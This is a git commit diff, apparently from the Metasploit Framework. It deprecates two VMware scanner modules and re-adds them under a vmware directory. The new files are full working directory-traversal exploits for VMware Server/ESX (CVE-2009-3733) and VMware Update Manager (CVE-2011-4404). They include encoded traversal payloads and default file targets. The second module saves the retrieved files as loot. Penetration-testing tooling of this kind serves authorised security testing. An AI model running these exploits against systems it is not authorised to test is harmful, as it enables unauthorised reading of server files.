Land rapid7#5508, Get Ready to Move VMware modules to the VMware directory

wchen-r7 · wchen-r7 · commit 8dad739c76dd · 2015-06-10T11:59:40.000-05:00
diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
@@ -12,6 +12,9 @@ class Metasploit3 < Msf::Auxiliary
   # Scanner mixin should be near last
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_server_dir_trav')
 
   def initialize
     super(
diff --git a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
@@ -10,6 +10,9 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015,7,21), 'auxiliary/scanner/vmware/vmware_update_manager_traversal')
 
   def initialize(info={})
     super(update_info(info,
diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  # Exploit mixins should be called first
+  include Msf::Exploit::Remote::HttpClient
+  # Scanner mixin should be near last
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'        => 'VMware Server Directory Traversal Vulnerability',
+      'Description' => 'This modules exploits the VMware Server Directory Traversal
+        vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
+        2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
+        allows remote attackers to read arbitrary files. Common VMware server ports
+        80/8222 and 443/8333 SSL.  If you want to download the entire VM, check out
+        the gueststealer tool.',
+      'Author'      => 'CG' ,
+      'License'     => MSF_LICENSE,
+      'References'	=>
+        [
+          [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
+          [ 'OSVDB', '59440' ],
+          [ 'BID', '36842' ],
+          [ 'CVE', '2009-3733' ],
+          [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
+        ]
+    )
+    register_options(
+      [
+        Opt::RPORT(8222),
+        OptString.new('FILE', [ true,  "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
+        OptString.new('TRAV', [ true,  "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
+      ], self.class)
+  end
+
+  def run_host(target_host)
+
+    begin
+      file = datastore['FILE']
+      trav = datastore['TRAV']
+      res = send_request_raw({
+        'uri'          => trav+file,
+        'version'      => '1.1',
+        'method'       => 'GET'
+      }, 25)
+
+      if res.nil?
+        print_error("Connection timed out")
+        return
+      end
+
+      if res.code == 200
+        #print_status("Output Of Requested File:\n#{res.body}")
+        print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
+        report_vuln(
+          {
+            :host   => target_host,
+            :port	=> rport,
+            :proto  => 'tcp',
+            :name	=> self.name,
+            :info   => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
+            :refs   => self.references,
+            :exploited_at => Time.now.utc
+          }
+        )
+      else
+        vprint_status("Received #{res.code} for #{trav}#{file}")
+      end
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+      print_error(e.message)
+    rescue ::Timeout::Error, ::Errno::EPIPE
+    end
+  end
+
+end
diff --git a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "VMWare Update Manager 4 Directory Traversal",
+      'Description'    => %q{
+        This modules exploits a directory traversal vulnerability in VMWare Update Manager
+        on port 9084.  Versions affected by this vulnerability: vCenter Update Manager
+        4.1 prior to Update 2, vCenter Update Manager 4 Update 4.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Alexey Sintsov',  #Initial discovery, poc
+          'sinn3r'           #Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2011-4404'],
+          ['EDB', '18138'],
+          ['URL', 'http://www.vmware.com/security/advisories/VMSA-2011-0014.html'],
+          ['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']
+        ],
+      'DisclosureDate' => "Nov 21 2011"))
+
+    register_options(
+      [
+        Opt::RPORT(9084),
+        OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
+        OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    fname     = File.basename(datastore['FILE'])
+    traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
+    uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
+
+    print_status("#{rhost}:#{rport} - Requesting: #{uri}")
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => uri
+    }, 25)
+
+    # If there's no response, don't bother
+    if res.nil? or res.body.empty?
+      print_error("No content retrieved from: #{ip}")
+      return
+    end
+
+    if res.code == 404
+      print_error("#{rhost}:#{rport} - File not found")
+      return
+    else
+      print_good("File retrieved from: #{ip}")
+      p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)
+      print_status("File stored in: #{p}")
+    end
+  end
+end
